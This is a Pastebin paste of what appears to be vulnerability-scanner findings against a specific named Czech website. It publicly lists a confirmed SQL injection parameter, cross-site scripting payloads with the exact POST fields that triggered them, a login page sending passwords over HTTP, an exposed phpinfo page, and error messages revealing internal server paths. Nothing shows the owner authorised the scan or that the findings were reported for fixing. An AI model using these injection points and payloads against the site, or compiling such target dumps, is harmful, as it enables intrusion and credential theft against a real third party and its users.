API tools faq
paste
Advertisement
sroub3k

ifpicr.cz

sroub3k
Oct 7th, 2011
253
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.00 KB | None | 0 0
raw download clone embed print report
  1. [High Possibility] SQL Injection
  2.  
  3. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  4. Severity : Critical
  5. Confirmation : Confirmed
  6. Detection Accuracy :
  7. Vulnerable URL: http://www.ifpicr.cz/?rubrika=%27
  8.  
  9. http://www.ifpicr.cz/?rubrika=%27&page=homepage
  10. http://www.ifpicr.cz/index.php?rubrika=%27&page=homepage
  11. http://www.ifpicr.cz/index.php?rubrika=%27
  12.  
  13. |||
  14.  
  15. Cross-site Scripting - XSS
  16.  
  17. Cross Site Scripting was found at: "http://www.ifpicr.cz/index.php", using HTTP method POST.
  18. The sent post-data was: "query=<SCrIPT>alert("Je tu XSS :)")</SCrIPT>&page=search".
  19. The modified parameter was "query".
  20. This vulnerability affects ALL browsers.
  21. This vulnerability was found in the request with id 274.
  22.  
  23. Cross Site Scripting was found at: "http://www.ifpicr.cz/index.php", using HTTP method POST.
  24. The sent post-data was: "query=Hello+World&page=<SCrIPT>alert("mQsW")</SCrIPT>".
  25. The modified parameter was "page".
  26. This vulnerability affects ALL browsers.
  27. This vulnerability was found in the request with id 294.
  28.  
  29. The web server at "http://www.ifpicr.cz/" is vulnerable to Cross Site Tracing.
  30. This vulnerability was found in the request with id 314.
  31.  
  32. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  33. Vulnerable URL: http://www.ifpicr.cz/index.php
  34. Parameter Name: page
  35. Parameter Type: Post
  36. Attack Pattern: '"--></style></script><script>alert(0x000086)</script>
  37.  
  38. Vulnerable URL: http://www.ifpicr.cz/index.php
  39. Parameter Name: page
  40. Parameter Type: Post
  41. Attack Pattern: '"--></style></script><script>alert(0x00013E)</script>
  42.  
  43. Vulnerable URL: http://www.ifpicr.cz/index.php
  44. Parameter Name: query
  45. Parameter Type: Post
  46. Attack Pattern: '"--></style></script><script>alert(0x00036C)</script>
  47.  
  48. Vulnerable URL : http://www.ifpicr.cz/index.php
  49. Parameter Name: query
  50. Parameter Type: Post
  51. Attack Pattern: '"--></style></script><script>alert(0x000423)</script>
  52.  
  53. |||
  54.  
  55. Password Transmitted Over HTTP
  56.  
  57. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  58. Vulnerable URL: http://www.ifpicr.cz/hitparadask/login.php
  59.  
  60. |||
  61.  
  62. phpinfo() Information Disclosure
  63.  
  64. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  65. Vulnerable URL: http://www.ifpicr.cz/phpinfo.php
  66.  
  67. |||
  68.  
  69. Programming Error Message
  70.  
  71. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
  72.  
  73. Vulnerable URL: http://www.ifpicr.cz/?rubrika=%27
  74.  
  75. Identified Error Message: <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/inc/fce.php</b> on line <b>157</b>
  76. <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/inc/fce.php</b> on line <b>189</b>
  77. <b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/data2/ifpicr/html/pages/clanky.php</b> on line <b>7</b>
  78.  
  79. Parameter Name: rubrika
  80. Parameter Type: Querystring
  81. Attack Pattern: %27
  82.  
  83. -----------
  84.  
  85.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!